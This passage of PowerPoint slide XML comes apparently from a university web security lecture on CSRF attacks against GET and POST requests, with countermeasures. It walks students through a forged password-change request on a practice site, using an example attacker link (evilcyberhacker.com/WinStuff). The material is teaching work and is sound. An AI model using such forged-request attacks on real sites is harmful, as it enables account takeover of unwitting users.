                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20C49EC9-08A5-7245-8978-F57C3F4A9403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="2679576"/>
            <a:ext cx="5981700" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04BF2D52-AFF6-4F45-9154-15019A07F838}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394400" y="1417638"/>
            <a:ext cx="7498080" cy="4800600"/>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lstStyle>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>Example: money transfer in online banking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>Transferring $100 to your friend Alice:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>How can an attacker exploit this URL in CSRF?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>How can the attacker get you (the victim) to visit their webpage and trigger this link?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15F23E18-7BE4-0848-BB0A-AC5F680AB98B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="4135438"/>
            <a:ext cx="6337300" cy="520700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="252907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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{560EF165-9C0A-C144-B8A1-2E60AA3079F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1829180" y="1445494"/>
            <a:ext cx="6451600" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1999376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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F4C96B-DF9A-8646-B604-87E10AB2AD61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="1412776"/>
            <a:ext cx="6832600" cy="3848100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3257589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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8E69EFD-6B0F-174E-ABFD-67DFB24E16E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1475656" y="1445494"/>
            <a:ext cx="6731000" cy="3670300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1552003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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E9F5749-6F4D-9B4C-98A7-2BA4A7449507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="1445494"/>
            <a:ext cx="6858000" cy="3733800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1319091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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBACE6F2-7CF7-EC40-948D-0C6F99B38555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1386408" y="1479774"/>
            <a:ext cx="6858000" cy="3683000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228408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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>Today’s Class</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394400" y="1417638"/>
            <a:ext cx="7498080" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82296" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>- Cross-site attacks: CSRF and XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82296" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>	- Their countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1946288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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69494BD3-2204-C942-8AA6-45B6F40E71B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1378148" y="1484784"/>
            <a:ext cx="7226300" cy="3683000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2134450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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on POST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0D5F1D-959D-0C48-97A1-1F82FEEC4352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1305941" y="1435705"/>
            <a:ext cx="7498080" cy="510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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Let’s use our vulnerable website. Go to and log in 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>hackyourselffirst.troyhunt.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Now pretend that you are the victim tricked into clicking the following link (so just copy and paste it into a new tab)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>evilcyberhacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>WinStuff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>What do you see?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72602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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on POST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448CE9F9-4DCA-9C4F-A33F-280B67E7D5DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8873067" y="-389467"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFF4B2F7-1F6D-1043-9F2F-E7BDE5902A10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1273284" y="1445494"/>
            <a:ext cx="7816090" cy="510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r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Now open the dev tool and navigate to Network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>You are going to see a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>ChangePassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> request in the form of a POST message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>The essence of this CSRF attack is that the attacker forges a fake form by knowing what the real form looks like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> (double click on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>ChangePassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> message and you’ll see the real form from the original website)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>For this attack to be successful, the authenticated session needs to be persisted (you can see your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>AuthCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t> in the request header)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Gill Sans MT" charset="0"/>
              </a:rPr>
              <a:t>Let’s take a closer look by View Page Source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Gill Sans MT" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107934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332656"/>
            <a:ext cx="8520600" cy="763600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fundamental Cause of CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1099332"/>
            <a:ext cx="7416824" cy="5758668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="231775" indent="-231775"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The server cannot distinguish whether a request is cross-site or same-site</a:t>
            </a:r>
          </a:p>
          <a:p>
